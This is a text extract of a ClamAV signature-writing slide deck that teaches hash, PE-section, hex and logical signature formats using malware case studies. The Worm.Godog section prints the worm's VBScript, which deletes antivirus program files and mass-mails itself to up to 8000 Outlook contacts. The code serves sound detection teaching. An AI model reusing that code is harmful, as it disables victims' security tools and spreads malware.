Clamav signatures

7/30/2019 Clamav signatures

http://slidepdf.com/reader/full/clamav-signatures 1/35

Writing ClamAV Signatures

Alain ZidouembaMarch 4, 2009



2

About the presenter

Alain Zidouemba

• VRT Research Engineer for over a year

• Primary responsibilities:• Malware research & signatures generation – ClamAV

• Vulnerability research & rules generation – Snort

• Before Sourcefire: Anti-Malware Research Engineer



3

Outline

What is ClamAVWhere to get ClamAV

Different ClamAV signature formats:

• .hdb

• .mdb

• .ndb

• .ldb

WhitelistingQ & A



ClamAV



5

What is ClamAV?

Clam AntiVirus (ClamAV) is an open source(GPL) anti-virus toolkit for UNIX, designedespecially for e-mail scanning on mail gateways

Provides a number of utilities including:

• A flexible and scalable multi-threaded daemon(clamd)

• A command line scanner (clamscan)

• An advanced tool for automatic database updates

(freshclam)• Sigtool – more later



6

Where can I get ClamAV from?

Latest stable release: ClamAV 0.94.2• http://www.clamav.net/download/sources

Most popular UNIX operating systems aresupported:

• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X

Up-to-date list of binary packages is availableat our website:

•

http://clamav.net/download/packages



7

Why learn how to write sigs?

I thought Sourcefire released signaturesupdates several times a day!



8

ClamAV malware detection

Goal: recognize and block malware

Detection is:

• File-centric

• Focus on recognizing malicious code in file

Not intended to replace desktop AV

First line of defense



9

ClamAV Virus Database (CVD)

The ClamAV project distributes two CVD files• main.cvd

• daily.cvd

Sigtool (ships with ClamAV) can display

detailed information on CVD files:



10

Various signature files in .cvdarchive



Writing signatures for ClamAV



12

Hash database: *.hdb

The format for .hdb files is as follows:• MD5:Size:MalwareName

To create a signature for test.exe use the --md5option of sigtool:



13

Hash database: *.hdb (cont’d)

That’s it! The signature is ready to be used:

• The name for the detection can be changed:



14

MD5, PE-section based: *.mdb

The format for .mdb files is as follows: • PESectionSize:MD5:MalwareName

The easiest way to generate MD5 basedsection signatures is to extract target PE

sections into separate files and then run sigtoolwith the option -- mdb:



15

Case study: Trojan.Bagle-328

IDA Pro indicates that the sample is “packed”

Packed with Themida (as per PEiD)



16

Case study: Trojan.Bagle-328(cont'd)

Themida is used by malware writers...butalso by legitimate products – false positivelikely

We can use pe-sig , a Ruby script that willcreate sigs for each section of a PE file:

Finally, the signature is:• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328



17

Extended sig. format: *.ndb

The format for .ndb files is as follows: • MalwareName:TargetType:Offset:HexSignature

TargetType is one of the following numbersspecifying the type of the target file:

0: Any file 4: Mail File

1: Portable Executable 5: Graphics

2: OLE2 component (eg: VBA script) 6: ELF3: HTML (normalized) 7: ASCII text file (normalized)



18

Case study: Trojan.Exchanger

Many files that are very similar yet different



19

Case study: Trojan.Exchanger (cont’d)

5.exe:

Opcode:• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

C d T j E h



20


7.exe:

Opcode:• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

C t d T j E h



21


Signature for 5.exe:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature for 7.exe:•

Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature to detect both 5.exe and 7.exe:• Trojan.Exchanger :1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

C t d T j E h



22


Moreover, for 5.exe:• EP: 0x4094E0

• Binary string: 0x4095C5

For 7.exe:

• EP: 0x406D87

• Binary string: 0x406E6C

In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)

C t d T j E h



23


Finally we can rewrite the signature to be:• Trojan.Exchanger :1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

This signature is more precise and even

matches other samples:



24

Logical signatures: *.ldb

Logical signatures introduced in ClamAV 0.94 The format for .ldb files is as follows:

• SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;...



25

Case study: Worm.Godog

A mass-mailer worm, code is in VBS

Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")

If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal Pro"

legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")

If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro &"\Kaspersky Lab\Kaspersky Antivirus Personal"

legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")

if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"

legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")

if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"

legions.DeleteFile (Registro & "\AVPersonal\*.*")

if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"

legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")

legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")

C t d W G d



26

Case study: Worm.Godog(cont’d)

After normalization, we can create 4 signaturesto detect each attempt to disable AV tools asfollows:

(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028

{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c

{-100}2e64656c65746566696c652028

{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c

(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028

{-25}202620225c6176706572736f6e616c

(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e

{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e

C t d W G d



27


Worm also send itself to the first 8000 contactsfound in the address book:

Set Create = CreateObject ("Scripting.FileSystemObject")

Set mail = Create.CreateTextFile("C:\mail.vbs")

mail.writeline "On Error Resume Next"

mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"

mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"

mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"

mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"mail.writeline "For A = 1 To Mail.AddressLists.Count"

mail.writeline "Set B = Mail.AddressLists (A)"

mail.writeline "Counter = 1"

mail.writeline "Set C = leg.CreateItem (0)"

mail.writeline "For D = 1 To B.AddressEntries.Count"

mail.writeline "E = B.AddressEntries (Counter)"

mail.writeline "C.Recipients.Add E"

mail.writeline "Counter = Counter + 1"

mail.writeline "If Counter > 8000 Then Exit For"

mail.writeline "Next"

mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)

mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)

mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)

mail.writeline "C.DeleteAfterSubmit = True"

mail.writeline "C.Send"

mail.writeline "Next"

mail.Close

legion.Run ("C:\mail.vbs")

C t d W G d



28


A signature to detect this worm portion of thefile could be:

(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74

{-100}726563697069656e74732e616464{-100}696620{-10}203e20

{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464

{-150}2e73656e64

Finally, we can write this highly flexiblesignature:• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)

in a .ldb file:Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64



29

Whitelisting

To whitelist a specific file create an entry in adatabase file with the extension of .fp followingthe MD5 signature format:

• MD5:FileSize:Comment



30

Whitelisting (cont’d)

To whitelist a specific signature insidemain.cvd add the following entry into a localfile local.ign:• db_name:line_number :signature_name

To ignore the “ myTestSignature” at line 23 intest.ndb:

• test.ndb:23:myTestSignature

Daily.ign:



31

More questions?

[email protected] - user questions

[email protected] - technicaldiscussions

Alternatively you can try asking on the#clamav IRC channel on irc.freenode.net

If you have questions or comments on this

presentation: [email protected]



32

ClamAV/VRT/Sourcefire

Websites• http://www.clamav.net

• http://www.snort.org

• htttp://www.sourcefire.com

Blogs

• http://clam-av.blogspot.com

•

http://vrt-sourcefire.blogspot.com



33

Contribute

Sample submission• http://www.clamav.net/sendvirus/

Upload statistics:

• freshclam --submit-stats

Bug submission

• http://bugs.clamav.net



Q & A

NOW GO AND WRITE



35

NOW GO AND WRITESIGNATURES!

Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714

Clamav signatures

Documents

Transcript of Clamav signatures